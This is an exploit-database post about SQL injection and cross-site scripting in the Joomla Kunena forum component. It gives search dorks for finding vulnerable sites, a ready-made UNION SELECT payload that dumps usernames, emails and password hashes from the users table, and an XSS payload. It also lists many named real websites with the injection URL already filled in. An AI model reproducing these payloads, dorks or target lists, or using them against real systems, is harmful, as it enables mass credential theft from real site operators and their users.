Joomla Kunena SQL Injection / Cross Site Scripting

Posted on 22 October 2012
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /'  __ /'__` / \__ /'__` 0
0 /\_,  ___ /\_/\_   ___  ,_/ /  _ ___ 1
1 /_/  /' _ ` / /_/_\_<_ /'___  /    /`'__ 0
0   / /    /   / \__/  \_  \_   / 1
1  \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1  \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| Joomla com_kunena - SQL Injection Vulnerability / Cross-Site Scripting |
--------------------------------------------------------------------------

+----------------| ABOUT ME |--------------------+
NAME: TAURUS OMAR -
HOME: ACCESOILEGAL.BLOGSPOT.COM -
TWITTER: @taurusomar_ -
E-MAIL: omar-taurus[at]dragonsecurity[dot]org -
E-MAIL: omar-taurus[at]live[dot]com -
PWNED: #ZUUU -
+------------------------------------------------+

# Exploit Title: Joomla com_kunena - SQL Injection Vulnerability / Cross-Site Scripting
# Vendor Name: Kunena
# Url Vendor: http://www.kunena.org/
# Category: WebApps
# Type: php
# Risk: Critical
# Dork: intext:"Powered by Kunena" com_kunena func=
# Dork: inurl:index.php?option=com_kunena&
# Dork: intext:"Gracias a Kunena" com_kunena func=
# Info: This Vulnerability Affects About 70 million Web's

# Exmaple/Sql=> http://site/index.php?option=com_kunena&func=userlist&search= [ Sql ]
# Example/Xss=> http://site/index.php?option=com_kunena&func=userlist&search= [ Xss ]

# Exploit/Comand/Sql=> %25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
# Exploit/Comand/Xss=> "><img src=x onerror=;;alert('1337') />

# Exmaple/Time_Real
http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.oui-iohe.org/webcolam/rifge/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;
http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%25%27%20and%201=2%29%20union%20select%201,%20concat%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,concat%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,%27Super%20Administrator%27,%27email%27,%272009-11-26%2022:09:28%27,%272009-11-26%2022:09:28%27,62,1,1,0,0,0,1,15%20from%20jos_users--%20;

# Sample/Sql/Xss/Vulnerabirility
http://racdelta.org/web/index.php?option=com_kunena&func=userlist&search=%'
http://pureos.org/index.php?option=com_kunena&func=userlist&search=%'
http://www.twinmos.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.vagturbo.cl/index.php?option=com_kunena&func=userlist&search=%'
http://www.ratobato.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.agft.org/index.php?option=com_kunena&func=userlist&search=%'
http://www.newgalleryfitness.com/portal/index.php?option=com_kunena&func=userlist&search=%'
http://www.nakhonbanguns.com/index.php?option=com_kunena&func=userlist&search=%'
http://www.becasuniversitarias.unt.edu.ar/index.php?option=com_kunena&func=userlist&search=%'
http://www.deandroid.com.ar/index.php?option=com_kunena&func=userlist&search=%'

# Many More in Goole & Bing
TOP
Malware :

Last 20
Exploits :

Last 20